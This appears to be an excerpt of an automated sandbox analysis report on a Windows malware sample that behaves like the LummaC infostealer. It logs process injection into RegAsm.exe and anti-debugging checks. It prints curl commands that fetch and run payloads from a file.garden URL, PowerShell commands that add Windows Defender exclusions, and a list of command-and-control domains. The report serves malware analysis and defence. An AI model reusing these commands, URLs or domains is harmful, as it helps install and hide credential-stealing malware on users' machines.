Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	6_2_0063C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0064B348 FindFirstFileExA,	6_2_0064B348

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_0063E6A3 VirtualQuery,GetSystemInfo,

6_2_0063E6A3

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior

Source: kdmapper.exe, 00000006.00000003.1365253438.0000000003131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: msedge.exe, 00000036.00000002.2099252173.0000000012D5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: msedge.exe, 00000010.00000002.1596134751.000000001C079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000009.00000002.1526355019.000000000315F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: kdmapper.exe, 00000006.00000003.1365253438.0000000003131000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r
Source: RegAsm.exe, 0000000C.00000002.1399368735.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 0000000C.00000002.1399125036.0000000001456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: curl.exe, 00000005.00000002.1348744210.0000025E1A777000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.1348395731.0000025E1A774000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000003.1365236663.000001D6FD264000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000008.00000002.1365439765.000001D6FD267000.00000004.00000020.00020000.00000000.sdmp, LBUPSPkYsNXrxZEtdVzCng.exe, 00000025.00000002.1754320531.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.1808541279.000001F2AD287000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000036.00000002.2118185806.000000001B580000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000003A.00000002.2048417189.000001EAC7B19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 00000009.00000003.1521195434.000000000315E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}v\

Source: C:\Windows\Speech\kdmapper.exe

API call chain: ExitProcess graph end node

graph_6-24917

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174BD0

Hides threads from debuggers

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Open window title or class name: windbgframeclass
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Open window title or class name: ollydbg.exe

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 12_2_00446730 LdrInitializeThunk,

12_2_00446730

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174BD0

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174BD0

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174760

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_00647DEE mov eax, dword ptr fs:[00000030h]

6_2_00647DEE

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

0_2_00007FF674174BD0

Source: C:\Edge\msedge.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Edge\msedge.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: 0_2_00007FF67418CDD8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF67418CDD8
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0063F838
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063F9D5 SetUnhandledExceptionFilter,	6_2_0063F9D5
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_0063FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_0063FBCA
Source: C:\Windows\Speech\kdmapper.exe	Code function: 6_2_00648EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00648EBD

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Speech\physmeme.exe

Code function: 10_2_02892129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

10_2_02892129

Injects a PE file into a foreign processes

Source: C:\Windows\Speech\physmeme.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: strappystyio.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: coursedonnyre.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: fossillargeiw.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tendencerangej.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: appleboltelwk.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tearrybyiwo.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: captainynfanw.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: surveriysiop.shop
Source: physmeme.exe, 0000000A.00000002.1381928855.0000000003895000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: tiddymarktwo.shop

Writes to foreign memory regions

Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E96008	Jump to behavior

Source: C:\Users\user\Desktop\gh3zRWl4or.exe

Code function: 0_2_00007FF67417ECC0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,

0_2_00007FF67417ECC0

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Process created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gu021d1q\gu021d1q.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\aj4rgj30\aj4rgj30.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Cb8ciTnPhW.bat"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC82C.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1C41CCC2AAF942199E65A42A37D1FE2.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESC9D2.tmp" "c:\Windows\System32\CSC8D4C5947C1F46278C3D663AFC6EA0A4.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Edge\msedge.exe "C:\Edge\msedge.exe"
Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NnkzcdwAFb.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe "C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exe"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\W7vO5ocqvr.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\Speech\kdmapper.exe

Code function: 6_2_0063F654 cpuid

6_2_0063F654

Source: C:\Users\user\Desktop\gh3zRWl4or.exe	Code function: GetLocaleInfoEx,FormatMessageA,		0_2_00007FF67418D900
Source: C:\Windows\Speech\kdmapper.exe	Code function: GetLocaleInfoW,GetNumberFormatW,		6_2_0063AF0F

Source: C:\Windows\Speech\physmeme.exe	Queries volume information: C:\Windows\Speech\physmeme.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Edge\msedge.exe VolumeInformation	Jump to behavior
Source: C:\Edge\msedge.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
